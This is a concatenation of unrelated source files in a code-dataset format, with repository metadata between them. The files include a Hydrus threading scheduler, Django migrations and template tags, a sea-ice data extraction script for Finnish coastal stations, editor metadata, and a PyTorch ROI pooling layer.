on_or_before="2020-11-16",
returning="numeric_value",
include_date_of_match=True,
include_month=True,
return_expectations={
"date": {"latest": "2020-11-16"},
"float": {"distribution": "normal", "mean": 40.0, "stddev": 20},
"incidence": 0.95,
},
),
hba1c_percentage=patients.with_these_clinical_events(
hba1c_old_codes,
find_last_match_in_period=True,
on_or_before="2020-11-16",
returning="numeric_value",
include_date_of_match=True,
include_month=True,
return_expectations={
"date": {"latest": "2020-11-16"},
"float": {"distribution": "normal", "mean": 5, "stddev": 2},
"incidence": 0.95,
},
),
# # https://github.com/ebmdatalab/tpp-sql-notebook/issues/49
ra_sle_psoriasis=patients.with_these_clinical_events(
ra_sle_psoriasis_codes, return_first_date_in_period=True, include_month=True,
),
) | [
"73470020+dgrint@users.noreply.github.com"
] | 73470020+dgrint@users.noreply.github.com |
2bc39bcc1beee6e7c11228aeb0f44298cf6663e7 | 50fb142226d75ed4a9d991555b9ee266f02260e5 | /include/HydrusThreading.py | bb9db952a7e15cd4f0b5f668c9b9a4383f881b68 | [
"WTFPL"
] | permissive | codelizard42/hydrus | 85a4ee0f90f96de01e2fcc0336d8bc57dcf418fe | 4bb6c317040819c87bf6085f74620441587ef2d1 | refs/heads/master | 2020-04-05T22:48:40.514900 | 2018-12-12T22:15:46 | 2018-12-12T22:15:46 | 30,299,239 | 1 | 0 | null | 2015-02-04T13:09:35 | 2015-02-04T13:09:34 | null | UTF-8 | Python | false | false | 17,836 | py | import bisect
import collections
import HydrusExceptions
import Queue
import random
import threading
import time
import traceback
import HydrusData
import HydrusGlobals as HG
import os
NEXT_THREAD_CLEAROUT = 0
THREADS_TO_THREAD_INFO = {}
THREAD_INFO_LOCK = threading.Lock()
def ClearOutDeadThreads():
with THREAD_INFO_LOCK:
all_threads = list( THREADS_TO_THREAD_INFO.keys() )
for thread in all_threads:
if not thread.is_alive():
del THREADS_TO_THREAD_INFO[ thread ]
def GetThreadInfo( thread = None ):
global NEXT_THREAD_CLEAROUT
if HydrusData.TimeHasPassed( NEXT_THREAD_CLEAROUT ):
ClearOutDeadThreads()
NEXT_THREAD_CLEAROUT = HydrusData.GetNow() + 600
if thread is None:
thread = threading.current_thread()
with THREAD_INFO_LOCK:
if thread not in THREADS_TO_THREAD_INFO:
thread_info = {}
thread_info[ 'shutting_down' ] = False
THREADS_TO_THREAD_INFO[ thread ] = thread_info
return THREADS_TO_THREAD_INFO[ thread ]
def IsThreadShuttingDown():
me = threading.current_thread()
if isinstance( me, DAEMON ):
if HG.view_shutdown:
return True
else:
if HG.model_shutdown:
return True
thread_info = GetThreadInfo()
return thread_info[ 'shutting_down' ]
def ShutdownThread( thread ):
thread_info = GetThreadInfo( thread )
thread_info[ 'shutting_down' ] = True
class DAEMON( threading.Thread ):
def __init__( self, controller, name ):
threading.Thread.__init__( self, name = name )
self._controller = controller
self._name = name
self._event = threading.Event()
self._controller.sub( self, 'wake', 'wake_daemons' )
self._controller.sub( self, 'shutdown', 'shutdown' )
def _DoPreCall( self ):
if HG.daemon_report_mode:
HydrusData.ShowText( self._name + ' doing a job.' )
def GetCurrentJobSummary( self ):
return 'unknown job'
def GetName( self ):
return self._name
def shutdown( self ):
ShutdownThread( self )
self.wake()
def wake( self ):
self._event.set()
class DAEMONWorker( DAEMON ):
def __init__( self, controller, name, callable, topics = None, period = 3600, init_wait = 3, pre_call_wait = 0 ):
if topics is None:
topics = []
DAEMON.__init__( self, controller, name )
self._callable = callable
self._topics = topics
self._period = period
self._init_wait = init_wait
self._pre_call_wait = pre_call_wait
for topic in topics:
self._controller.sub( self, 'set', topic )
self.start()
def _CanStart( self, time_started_waiting ):
return self._PreCallWaitIsDone( time_started_waiting ) and self._ControllerIsOKWithIt()
def _ControllerIsOKWithIt( self ):
return True
def _PreCallWaitIsDone( self, time_started_waiting ):
# just shave a bit off so things that don't have any wait won't somehow have to wait a single accidentaly cycle
time_to_start = ( float( time_started_waiting ) - 0.1 ) + self._pre_call_wait
return HydrusData.TimeHasPassed( time_to_start )
def GetCurrentJobSummary( self ):
return self._callable
def run( self ):
self._event.wait( self._init_wait )
while True:
if IsThreadShuttingDown():
return
time_started_waiting = HydrusData.GetNow()
while not self._CanStart( time_started_waiting ):
time.sleep( 1 )
if IsThreadShuttingDown():
return
self._DoPreCall()
try:
self._callable( self._controller )
except HydrusExceptions.ShutdownException:
return
except Exception as e:
HydrusData.ShowText( 'Daemon ' + self._name + ' encountered an exception:' )
HydrusData.ShowException( e )
if IsThreadShuttingDown(): return
self._event.wait( self._period )
self._event.clear()
def set( self, *args, **kwargs ): self._event.set()
# Big stuff like DB maintenance that we don't want to run while other important stuff is going on, like user interaction or vidya on another process
class DAEMONBackgroundWorker( DAEMONWorker ):
def _ControllerIsOKWithIt( self ):
return self._controller.GoodTimeToDoBackgroundWork()
# Big stuff that we want to run when the user sees, but not at the expense of something else, like laggy session load
class DAEMONForegroundWorker( DAEMONWorker ):
def _ControllerIsOKWithIt( self ):
return self._controller.GoodTimeToDoForegroundWork()
class THREADCallToThread( DAEMON ):
def __init__( self, controller, name ):
DAEMON.__init__( self, controller, name )
self._callable = None
self._queue = Queue.Queue()
self._currently_working = True # start off true so new threads aren't used twice by two quick successive calls
def CurrentlyWorking( self ):
return self._currently_working
def GetCurrentJobSummary( self ):
return self._callable
def put( self, callable, *args, **kwargs ):
self._currently_working = True
self._queue.put( ( callable, args, kwargs ) )
self._event.set()
def run( self ):
while True:
try:
while self._queue.empty():
if IsThreadShuttingDown():
return
self._event.wait( 1200 )
self._event.clear()
self._DoPreCall()
( callable, args, kwargs ) = self._queue.get()
self._callable = ( callable, args, kwargs )
callable( *args, **kwargs )
self._callable = None
del callable
except HydrusExceptions.ShutdownException:
return
except Exception as e:
HydrusData.Print( traceback.format_exc() )
HydrusData.ShowException( e )
finally:
self._currently_working = False
time.sleep( 0.00001 )
class JobScheduler( threading.Thread ):
def __init__( self, controller ):
threading.Thread.__init__( self, name = 'Job Scheduler' )
self._controller = controller
self._waiting = []
self._waiting_lock = threading.Lock()
self._new_job_arrived = threading.Event()
self._current_job = None
self._cancel_filter_needed = threading.Event()
self._sort_needed = threading.Event()
self._controller.sub( self, 'shutdown', 'shutdown' )
def _FilterCancelled( self ):
with self._waiting_lock:
self._waiting = [ job for job in self._waiting if not job.IsCancelled() ]
def _GetLoopWaitTime( self ):
with self._waiting_lock:
if len( self._waiting ) == 0:
return 0.2
next_job = self._waiting[0]
time_delta_until_due = next_job.GetTimeDeltaUntilDue()
return min( 1.0, time_delta_until_due )
def _NoWorkToStart( self ):
with self._waiting_lock:
if len( self._waiting ) == 0:
return True
next_job = self._waiting[0]
if next_job.IsDue():
return False
else:
return True
def _SortWaiting( self ):
# sort the waiting jobs in ascending order of expected work time
with self._waiting_lock: # this uses __lt__ to sort
self._waiting.sort()
def _StartWork( self ):
jobs_started = 0
while True:
with self._waiting_lock:
if len( self._waiting ) == 0:
break
if jobs_started >= 10: # try to avoid spikes
break
next_job = self._waiting[0]
if next_job.IsDue():
next_job = self._waiting.pop( 0 )
next_job.StartWork()
jobs_started += 1
else:
break # all the rest in the queue are not due
def AddJob( self, job ):
with self._waiting_lock:
bisect.insort( self._waiting, job )
self._new_job_arrived.set()
def ClearOutDead( self ):
with self._waiting_lock:
self._waiting = [ job for job in self._waiting if not job.IsDead() ]
def GetName( self ):
return 'Job Scheduler'
def GetCurrentJobSummary( self ):
with self._waiting_lock:
return HydrusData.ToHumanInt( len( self._waiting ) ) + ' jobs'
def GetPrettyJobSummary( self ):
with self._waiting_lock:
num_jobs = len( self._waiting )
job_lines = [ repr( job ) for job in self._waiting ]
lines = [ HydrusData.ToHumanInt( num_jobs ) + ' jobs:' ] + job_lines
text = os.linesep.join( lines )
return text
def JobCancelled( self ):
self._cancel_filter_needed.set()
def shutdown( self ):
ShutdownThread( self )
def WorkTimesHaveChanged( self ):
self._sort_needed.set()
def run( self ):
while True:
try:
while self._NoWorkToStart():
if IsThreadShuttingDown():
return
#
if self._cancel_filter_needed.is_set():
self._FilterCancelled()
self._cancel_filter_needed.clear()
if self._sort_needed.is_set():
self._SortWaiting()
self._sort_needed.clear()
continue # if some work is now due, let's do it!
#
wait_time = self._GetLoopWaitTime()
self._new_job_arrived.wait( wait_time )
self._new_job_arrived.clear()
self._StartWork()
except HydrusExceptions.ShutdownException:
return
except Exception as e:
HydrusData.Print( traceback.format_exc() )
HydrusData.ShowException( e )
time.sleep( 0.00001 )
class SchedulableJob( object ):
def __init__( self, controller, scheduler, initial_delay, work_callable ):
self._controller = controller
self._scheduler = scheduler
self._work_callable = work_callable
self._next_work_time = HydrusData.GetNowFloat() + initial_delay
self._work_lock = threading.Lock()
self._currently_working = threading.Event()
self._is_cancelled = threading.Event()
def __lt__( self, other ): # for the scheduler to do bisect.insort noice
return self._next_work_time < other._next_work_time
def __repr__( self ):
return repr( self.__class__ ) + ': ' + repr( self._work_callable ) + ' next in ' + HydrusData.TimeDeltaToPrettyTimeDelta( self._next_work_time - HydrusData.GetNowFloat() )
def _BootWorker( self ):
self._controller.CallToThread( self.Work )
def Cancel( self ):
self._is_cancelled.set()
self._scheduler.JobCancelled()
def CurrentlyWorking( self ):
return self._currently_working.is_set()
def GetTimeDeltaUntilDue( self ):
return HydrusData.GetTimeDeltaUntilTimeFloat( self._next_work_time )
def IsCancelled( self ):
return self._is_cancelled.is_set()
def IsDead( self ):
return False
def IsDue( self ):
return HydrusData.TimeHasPassedFloat( self._next_work_time )
def StartWork( self ):
if self._is_cancelled.is_set():
return
self._currently_working.set()
self._BootWorker()
def Wake( self, next_work_time = None ):
if next_work_time is None:
next_work_time = HydrusData.GetNowFloat()
self._next_work_time = next_work_time
self._scheduler.WorkTimesHaveChanged()
def Work( self ):
try:
with self._work_lock:
self._work_callable()
finally:
self._currently_working.clear()
class RepeatingJob( SchedulableJob ):
def __init__( self, controller, scheduler, initial_delay, period, work_callable ):
SchedulableJob.__init__( self, controller, scheduler, initial_delay, work_callable )
self._period = period
self._stop_repeating = threading.Event()
def Cancel( self ):
SchedulableJob.Cancel( self )
self._stop_repeating.set()
def Delay( self, delay ):
self._next_work_time = HydrusData.GetNowFloat() + delay
self._scheduler.WorkTimesHaveChanged()
def IsFinishedWorking( self ):
return self._stop_repeating.is_set()
def SetPeriod( self, period ):
if period > 10.0:
period += random.random() # smooth out future spikes if ten of these all fire at the same time
self._period = period
def StartWork( self ):
if self._stop_repeating.is_set():
return
SchedulableJob.StartWork( self )
def Work( self ):
SchedulableJob.Work( self )
if not self._stop_repeating.is_set():
self._next_work_time = HydrusData.GetNowFloat() + self._period
self._scheduler.AddJob( self )
| [
"hydrus.admin@gmail.com"
] | hydrus.admin@gmail.com |
6d2f69de2487fa86a348999f7695b0190ce4b725 | 78d7d7aeb78a8cea6d0e10b89fc4aa6c46c95227 | /3995.py | a3eefaf7f66a32547cbdcc5db18db51791b52a02 | [] | no_license | GenryEden/kpolyakovName | 97db13ef93061a8c2afc6cc5acd91337f79063f1 | c5d7f631ae7ec8770e56170574b82ea2b7d8a4d9 | refs/heads/master | 2023-05-23T21:22:51.983756 | 2021-06-21T08:56:49 | 2021-06-21T08:56:49 | 350,466,773 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | def check(x):
if sum([int(s) for s in oct(x)[2:]]) % 19 != 0:
return False
m = 1
for s in oct(x)[2:]:
m *= int(s)
return m % 5 == 0
cnt = 0
minimal = 0
for x in range(12345, 67890+1):
if check(x):
cnt += 1
if cnt == 1:
minimal = x
print(cnt, minimal) | [
"a926788@gmail.com"
] | a926788@gmail.com |
a81de31ca3b7bff30edbf232df80154a71a6a675 | ce36305a43aad1ed7df25e73d7b90a811c257f29 | /dashboard/migrations/0005_major.py | c77b73080582844b38d317916cbf0c0235373e03 | [] | no_license | EngHell/pm2-practica3 | 10f6623a73c3e284da85024f05ad6c86e7393644 | 2dbe08a27a56616c7f15aac9eaac2deb3a8cd489 | refs/heads/master | 2023-04-21T05:59:56.909702 | 2021-05-12T10:53:54 | 2021-05-12T10:53:54 | 364,018,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 813 | py | # Generated by Django 3.1.7 on 2021-03-18 20:19
from django.db import migrations, models
def seed_database(apps, schema_editor):
Major = apps.get_model('dashboard', 'Major')
Major(code='M01', name='Matematica').save()
Major(code='F01', name='Fisica').save()
class Migration(migrations.Migration):
dependencies = [
('dashboard', '0004_auto_20210318_0708'),
]
operations = [
migrations.CreateModel(
name='Major',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=10, unique=True)),
('name', models.CharField(max_length=255)),
],
),
migrations.RunPython(seed_database)
]
| [
"migueln6@gmail.com"
] | migueln6@gmail.com |
bd6d1d5a395d1a59e39358b8164d34d56dbcb1cb | 82e78f606f8c203cb77b1e3e8fd3b13158f31af8 | /thenewboston/transactions/validation.py | 8612d11da9a8ba93fe0d80accb79bbd627413987 | [
"MIT"
] | permissive | rajat4665/thenewboston-python | 1f0b8aea02fb8dbfb2eea60cd1ef07ac12fad667 | df842c793fe7bfd8731fd8746abf25747c9e569e | refs/heads/master | 2022-11-26T00:46:54.848608 | 2020-07-26T00:12:06 | 2020-07-26T00:12:06 | 283,263,021 | 0 | 0 | MIT | 2020-07-28T16:07:08 | 2020-07-28T16:07:07 | null | UTF-8 | Python | false | false | 403 | py | def validate_transaction_exists(*, amount, error, recipient, txs):
"""
Check for the existence of a Tx
"""
tx = next((tx for tx in txs if tx.get('amount') == amount and tx.get('recipient') == recipient), None)
if not tx:
raise error({
'error_message': 'Tx not found',
'expected_amount': amount,
'expected_recipient': recipient
})
| [
"buckyroberts@gmail.com"
] | buckyroberts@gmail.com |
4220d040287852ff2cb51884d1f88a13f9e80009 | af9268e1ead8cdb491868c14a2240d9e44fb3b56 | /last-minute-env/lib/python2.7/site-packages/django/contrib/admin/templatetags/admin_static.py | 62b8691f9c135756c86c3975ad0fb508ab08de89 | [] | no_license | frosqh/Cousinade2017 | d5154c24c93ca8089eeba26b53c594e92cb6bd82 | c34d5707af02402bf2bb7405eddc91297da399ff | refs/heads/master | 2021-01-20T07:57:34.586476 | 2017-10-22T18:42:45 | 2017-10-22T18:42:45 | 90,074,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py | from django.template import Library
from django.templatetags.static import static as _static
register = Library()
@register.simple_tag
def static(path):
# Backwards compatibility alias for django.templatetags.static.static().
# Deprecation should start in Django 2.0.
return _static(path)
| [
"frosqh@gmail.com"
] | frosqh@gmail.com |
ff74e48bde7614a0015fb731371ce9c36ee3cf1f | 194848d309f1b5ea1e7749d3560d99f9aa158431 | /sea_ice/scripts/Ice_data_stations.py | fd462e081d21a680b99789843e60ea0c66e0fcf3 | [] | no_license | siirias/nemo_analysis | 967d7012a1b963e46290b7d83a7d23293f0d168c | d20181750406445a259c2c0de02f5c1eabd51d0d | refs/heads/master | 2023-03-16T08:16:21.595165 | 2023-03-09T16:17:45 | 2023-03-09T16:17:45 | 177,143,292 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,666 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 18 09:54:54 2020
@author: oikkonea
"""
# This script extracts sea ice data (concetration, volume) for coastal stations.
# Daily data is saved in txt files for further analysis and plotting
# Stations: Kemi, Oulu (Saapaskari), Kalajoki, Kylmäpihlaja and Sälgrund
from __future__ import division
import matplotlib.pyplot as plt
import numpy as np
import netCDF4 as nc
import datetime as dt
from smartseahelper import smh
ss=smh()
reftime=dt.datetime(1950,1,1)
#Kemi
obs_lat = 65.72
obs_lon = 24.43
with open("ice_seasons/Ice_season_Kemi_D005.txt", "w") as a_file:
for i in range(2006,2060):
year=i
print year
#data=nc.Dataset('run_data/NORDIC-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
data=nc.Dataset('run_data/SS-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
lons = data.variables['nav_lon'][:]
lats = data.variables['nav_lat'][:]
abslat = np.abs(lats-obs_lat)
abslon= np.abs(lons-obs_lon)
c = np.maximum(abslon,abslat)
latlon_idx = np.argmin(c)
x, y = np.where(c == np.min(c))
vol=data.variables['icevolume'][:,:,:]
conc = data.variables['icecon'][:,:,:]
vol_Kemi=vol[:,x,y]
conc_Kemi=conc[:,x,y]
for j in range(len(vol_Kemi)):
a_file.write("\n")
a_file.write("{:},{:},{:},{:}".format(year,j,conc_Kemi[j][0],vol_Kemi[j][0]))
#saapaskari (oulu)
obs_lat = 65.05
obs_lon = 25.17
with open("ice_seasons/Ice_season_Saapaskari_D005.txt", "w") as a_file:
for i in range(2006,2060):
year=i
print year
# data=nc.Dataset('run_data/NORDIC-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
data=nc.Dataset('run_data/SS-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
lons = data.variables['nav_lon'][:]
lats = data.variables['nav_lat'][:]
abslat = np.abs(lats-obs_lat)
abslon= np.abs(lons-obs_lon)
c = np.maximum(abslon,abslat)
latlon_idx = np.argmin(c)
x, y = np.where(c == np.min(c))
vol=data.variables['icevolume'][:,:,:]
conc = data.variables['icecon'][:,:,:]
vol_Saapaskari=vol[:,x,y]
conc_Saapaskari=conc[:,x,y]
for j in range(len(vol_Saapaskari)):
a_file.write("\n")
a_file.write("{:},{:},{:},{:}".format(year,j,conc_Saapaskari[j][0],vol_Saapaskari[j][0]))
#Kalajoki
obs_lat = 64.29
obs_lon = 23.89
with open("ice_seasons/Ice_season_Kalajoki_D005.txt", "w") as a_file:
for i in range(2006,2060):
year=i
print year
# data=nc.Dataset('run_data/NORDIC-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
data=nc.Dataset('run_data/SS-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
lons = data.variables['nav_lon'][:]
lats = data.variables['nav_lat'][:]
abslat = np.abs(lats-obs_lat)
abslon= np.abs(lons-obs_lon)
c = np.maximum(abslon,abslat)
latlon_idx = np.argmin(c)
x, y = np.where(c == np.min(c))
vol=data.variables['icevolume'][:,:,:]
conc = data.variables['icecon'][:,:,:]
vol_Kalajoki=vol[:,x,y]
conc_Kalajoki=conc[:,x,y]
for j in range(len(vol_Kalajoki)):
a_file.write("\n")
a_file.write("{:},{:},{:},{:}".format(year,j,conc_Kalajoki[j][0],vol_Kalajoki[j][0]))
#Kylmäpihlaja
obs_lat = 61.14
obs_lon = 21.31
with open("ice_seasons/Ice_season_Kylmapihlaja_D005.txt", "w") as a_file:
for i in range(2006,2060):
year=i
print year
# data=nc.Dataset('run_data/NORDIC-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
data=nc.Dataset('run_data/SS-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
lons = data.variables['nav_lon'][:]
lats = data.variables['nav_lat'][:]
abslat = np.abs(lats-obs_lat)
abslon= np.abs(lons-obs_lon)
c = np.maximum(abslon,abslat)
latlon_idx = np.argmin(c)
x, y = np.where(c == np.min(c))
vol=data.variables['icevolume'][:,:,:]
conc = data.variables['icecon'][:,:,:]
vol_Kylmapihlaja=vol[:,x,y]
conc_Kylmapihlaja=conc[:,x,y]
for j in range(len(vol_Kylmapihlaja)):
a_file.write("\n")
a_file.write("{:},{:},{:},{:}".format(year,j,conc_Kylmapihlaja[j][0],vol_Kylmapihlaja[j][0]))
#Sälgrund
obs_lat = 62.33
obs_lon = 21.21
with open("ice_seasons/Ice_season_Salgrund_D005.txt", "w") as a_file:
for i in range(1980,20092006,2060):
year=i
print year
# data=nc.Dataset('run_data/NORDIC-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
data=nc.Dataset('run_data/SS-GOB_1d_{:}0101_{:}1231_grid_T.nc'.format(year,year))
lons = data.variables['nav_lon'][:]
lats = data.variables['nav_lat'][:]
abslat = np.abs(lats-obs_lat)
abslon= np.abs(lons-obs_lon)
c = np.maximum(abslon,abslat)
latlon_idx = np.argmin(c)
x, y = np.where(c == np.min(c))
vol=data.variables['icevolume'][:,:,:]
conc = data.variables['icecon'][:,:,:]
vol_Salgrund=vol[:,x,y]
conc_Salgrund=conc[:,x,y]
for j in range(len(vol_Salgrund)):
a_file.write("\n")
a_file.write("{:},{:},{:},{:}".format(year,j,conc_Salgrund[j][0],vol_Salgrund[j][0]))
| [
"simo.siiria@fmi.fi"
] | simo.siiria@fmi.fi |
24053881224fa4eeef0ad6eded09146927976cc0 | 5b3d8f56f4d18dc8809f9f5aa7d2a7089cdbf489 | /.c9/metadata/workspace/FrequenciesMain/PMchecksSPINT.py | 3fc1d903ca16a8e76e8844d6096538a62339ba3c | [] | no_license | heyliljill/edpsych-cloned | 89ba1a827ed66651b7387b25bc2c188ff344e8d1 | ba02e4789e390bb6488b11608b994ee5678a4b30 | refs/heads/master | 2020-07-26T00:51:41.004018 | 2019-09-14T17:26:45 | 2019-09-14T17:26:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,118 | py | {"filter":false,"title":"PMchecksSPINT.py","tooltip":"/FrequenciesMain/PMchecksSPINT.py","undoManager":{"mark":18,"position":18,"stack":[[{"start":{"row":2,"column":18},"end":{"row":2,"column":19},"action":"insert","lines":["S"],"id":2}],[{"start":{"row":2,"column":19},"end":{"row":2,"column":20},"action":"insert","lines":["P"],"id":3}],[{"start":{"row":2,"column":20},"end":{"row":2,"column":21},"action":"insert","lines":["I"],"id":4}],[{"start":{"row":2,"column":21},"end":{"row":2,"column":22},"action":"insert","lines":["N"],"id":5}],[{"start":{"row":2,"column":22},"end":{"row":2,"column":23},"action":"insert","lines":["T"],"id":6}],[{"start":{"row":6,"column":0},"end":{"row":7,"column":0},"action":"insert","lines":["",""],"id":7}],[{"start":{"row":7,"column":0},"end":{"row":8,"column":0},"action":"insert","lines":["",""],"id":8}],[{"start":{"row":8,"column":0},"end":{"row":19,"column":4},"action":"insert","lines":["for i in range(0,2):"," ## SELECT HIGH INTEREST ## "," filtersign = [\"~=\",\"=\"]"," if mathread == \"m\":"," spint = \"mathspint\""," elif mathread == \"r\":"," spint = \"readspint\""," "," filterText = \"\"\"USE ALL. \\nCOMPUTE filter_$=(\"\"\"+spint+filtersign[i]+ \"2\"+\"\"\"). \\nVARIABLE LABELS filter_$ '\"\"\" + spint+filtersign[i]+ \"2\" +\"\"\"(FILTER)'. \\nVALUE LABELS filter_$ 0 'Not Selected' 1 'Selected'. \\nFORMATS filter_$ (f1.0). \\nFILTER BY filter_$. \\nEXECUTE.\\n\\n\"\"\""," "," f.write(filterText)"," "],"id":9}],[{"start":{"row":19,"column":0},"end":{"row":19,"column":4},"action":"insert","lines":[" "],"id":10},{"start":{"row":20,"column":0},"end":{"row":20,"column":4},"action":"insert","lines":[" "]},{"start":{"row":21,"column":0},"end":{"row":21,"column":4},"action":"insert","lines":[" "]},{"start":{"row":22,"column":0},"end":{"row":22,"column":4},"action":"insert","lines":[" "]},{"start":{"row":23,"column":0},"end":{"row":23,"column":4},"action":"insert","lines":[" "]},{"start":{"row":24,"column":0},"end":{"row":24,"column":4},"action":"insert","lines":[" "]},{"start":{"row":25,"column":0},"end":{"row":25,"column":4},"action":"insert","lines":[" "]},{"start":{"row":26,"column":0},"end":{"row":26,"column":4},"action":"insert","lines":[" "]},{"start":{"row":27,"column":0},"end":{"row":27,"column":4},"action":"insert","lines":[" "]},{"start":{"row":28,"column":0},"end":{"row":28,"column":4},"action":"insert","lines":[" "]},{"start":{"row":29,"column":0},"end":{"row":29,"column":4},"action":"insert","lines":[" "]},{"start":{"row":30,"column":0},"end":{"row":30,"column":4},"action":"insert","lines":[" "]},{"start":{"row":31,"column":0},"end":{"row":31,"column":4},"action":"insert","lines":[" "]},{"start":{"row":32,"column":0},"end":{"row":32,"column":4},"action":"insert","lines":[" "]},{"start":{"row":33,"column":0},"end":{"row":33,"column":4},"action":"insert","lines":[" "]},{"start":{"row":34,"column":0},"end":{"row":34,"column":4},"action":"insert","lines":[" "]},{"start":{"row":35,"column":0},"end":{"row":35,"column":4},"action":"insert","lines":[" "]},{"start":{"row":36,"column":0},"end":{"row":36,"column":4},"action":"insert","lines":[" "]},{"start":{"row":37,"column":0},"end":{"row":37,"column":4},"action":"insert","lines":[" "]},{"start":{"row":38,"column":0},"end":{"row":38,"column":4},"action":"insert","lines":[" "]},{"start":{"row":39,"column":0},"end":{"row":39,"column":4},"action":"insert","lines":[" "]},{"start":{"row":40,"column":0},"end":{"row":40,"column":4},"action":"insert","lines":[" "]},{"start":{"row":41,"column":0},"end":{"row":41,"column":4},"action":"insert","lines":[" "]},{"start":{"row":42,"column":0},"end":{"row":42,"column":4},"action":"insert","lines":[" "]},{"start":{"row":43,"column":0},"end":{"row":43,"column":4},"action":"insert","lines":[" "]},{"start":{"row":44,"column":0},"end":{"row":44,"column":4},"action":"insert","lines":[" "]},{"start":{"row":45,"column":0},"end":{"row":45,"column":4},"action":"insert","lines":[" "]},{"start":{"row":46,"column":0},"end":{"row":46,"column":4},"action":"insert","lines":[" "]},{"start":{"row":47,"column":0},"end":{"row":47,"column":4},"action":"insert","lines":[" "]},{"start":{"row":48,"column":0},"end":{"row":48,"column":4},"action":"insert","lines":[" "]},{"start":{"row":49,"column":0},"end":{"row":49,"column":4},"action":"insert","lines":[" "]},{"start":{"row":50,"column":0},"end":{"row":50,"column":4},"action":"insert","lines":[" "]},{"start":{"row":51,"column":0},"end":{"row":51,"column":4},"action":"insert","lines":[" "]},{"start":{"row":52,"column":0},"end":{"row":52,"column":4},"action":"insert","lines":[" "]},{"start":{"row":53,"column":0},"end":{"row":53,"column":4},"action":"insert","lines":[" "]},{"start":{"row":54,"column":0},"end":{"row":54,"column":4},"action":"insert","lines":[" "]},{"start":{"row":55,"column":0},"end":{"row":55,"column":4},"action":"insert","lines":[" "]},{"start":{"row":56,"column":0},"end":{"row":56,"column":4},"action":"insert","lines":[" "]},{"start":{"row":57,"column":0},"end":{"row":57,"column":4},"action":"insert","lines":[" "]},{"start":{"row":58,"column":0},"end":{"row":58,"column":4},"action":"insert","lines":[" "]},{"start":{"row":59,"column":0},"end":{"row":59,"column":4},"action":"insert","lines":[" "]}],[{"start":{"row":59,"column":62},"end":{"row":60,"column":0},"action":"insert","lines":["",""],"id":11},{"start":{"row":60,"column":0},"end":{"row":60,"column":8},"action":"insert","lines":[" "]}],[{"start":{"row":60,"column":8},"end":{"row":61,"column":0},"action":"insert","lines":["",""],"id":12},{"start":{"row":61,"column":0},"end":{"row":61,"column":8},"action":"insert","lines":[" "]}],[{"start":{"row":61,"column":8},"end":{"row":62,"column":0},"action":"insert","lines":["",""],"id":13},{"start":{"row":62,"column":0},"end":{"row":62,"column":8},"action":"insert","lines":[" "]}],[{"start":{"row":62,"column":4},"end":{"row":62,"column":8},"action":"remove","lines":[" "],"id":14}],[{"start":{"row":62,"column":0},"end":{"row":62,"column":4},"action":"remove","lines":[" "],"id":15}],[{"start":{"row":62,"column":0},"end":{"row":64,"column":12},"action":"insert","lines":["f.write(\"\"\"FILTER OFF.","USE ALL.","EXECUTE.\"\"\")"],"id":16}],[{"start":{"row":7,"column":0},"end":{"row":8,"column":0},"action":"insert","lines":["",""],"id":17}],[{"start":{"row":8,"column":0},"end":{"row":9,"column":0},"action":"insert","lines":["",""],"id":18}],[{"start":{"row":8,"column":0},"end":{"row":8,"column":15},"action":"insert","lines":["mathread == \"m\""],"id":19}],[{"start":{"row":8,"column":10},"end":{"row":8,"column":11},"action":"remove","lines":["="],"id":20}]]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":8,"column":0},"end":{"row":20,"column":23},"isBackwards":true},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1456345978891,"hash":"4ea48e1405f9aea3952e15cbcbc5d2706399170d"} | [
"jillyma@gmail.com"
] | jillyma@gmail.com |
558a6dcac84f11a72034f4701f4143645c0414fd | 63b864deda44120067eff632bbb4969ef56dd573 | /object_detection/fast rcnn/roi.py | f7f8c76fbc257a5e40c8450b8615c8b335e4a852 | [] | no_license | lizhe960118/Deep-Learning | d134592c327decc1db12cbe19d9a1c85a5056086 | 7d2c4f3a0512ce4bd2f86c9f455da9866d16dc3b | refs/heads/master | 2021-10-29T06:15:04.749917 | 2019-07-19T15:27:25 | 2019-07-19T15:27:25 | 152,355,392 | 5 | 2 | null | 2021-10-12T22:19:33 | 2018-10-10T03:06:44 | Jupyter Notebook | UTF-8 | Python | false | false | 1,310 | py | import numpy as np
import torch
import torch.nn as nn
class ROIPool(nn.Module):
def __init__(self, output_size):
super().__init__()
self.maxpool = nn.AdaptiveMaxPool2d(output_size)
self.size = output_size
def forward(self, images, rois, roi_idx):
# images:特征图 image_batchsize * channels * h * w
# rois:[[x1,y1,x2,y2], ...] n * 4
# roi_idx:[4,5,8,7] n * 1, roi_idx[i]保存的是rois[i]对应的是哪个特征图
n = rois.shape[0] # 有多少个建议框
h = images.size(2)
w = images.size(3)
x1 = rois[:,0] # 提取框的位置,此处缩放为到(0,1)
y1 = rois[:,1]
x2 = rois[:,2]
y2 = rois[:,3]
x1 = np.floor(x1 * w).astype(int) # 回归到特征图的位置
x2 = np.ceil(x2 * w).astype(int)
y1 = np.floor(y1 * h).astype(int)
y2 = np.ceil(y2 * h).astype(int)
res = []
for i in range(n):
img = images[roi_idx[i]].unsqueeze(0)
img = img[:, :, y1[i]:y2[i], x1[i]:x2[i]]
img = self.maxpool(img) # 调用的self.maxpool直接输出output_size*output_size大小的特征图
res.append(img)
res = torch.cat(res, dim=0) # n * output_size * output_size
return res
| [
"2957308424@qq.com"
